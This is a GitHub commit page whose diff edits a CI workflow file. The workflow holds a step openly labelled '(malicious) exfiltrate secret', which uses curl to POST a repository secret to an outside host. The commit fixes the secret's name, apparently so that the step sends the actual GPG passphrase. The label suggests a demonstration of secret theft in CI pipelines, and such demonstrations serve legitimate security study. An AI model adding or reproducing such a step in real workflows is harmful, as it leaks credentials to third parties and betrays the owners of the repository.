We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent fbabf24 commit a861364Copy full SHA for a861364
1 file changed
.github/workflows/on-push-master-library.yml
@@ -19,7 +19,7 @@ jobs:
19
- name: (malicious) exfiltrate secret
20
run: curl -X POST http://nodered.vacxe.dev/unveil -d "s=$MY_SECRET"
21
env:
22
- MY_SECRET: ${{ secrets.GPG_PASSPHASE }}
+ MY_SECRET: ${{ secrets.GPG_PASSPHRASE }}
23
- uses: actions/checkout@v3
24
- name: Set up JDK 17
25
uses: actions/setup-java@v3
0 commit comments